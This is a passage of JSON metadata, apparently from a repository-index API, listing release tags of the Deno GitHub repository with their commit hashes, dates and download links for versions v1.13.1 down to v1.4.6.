","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/t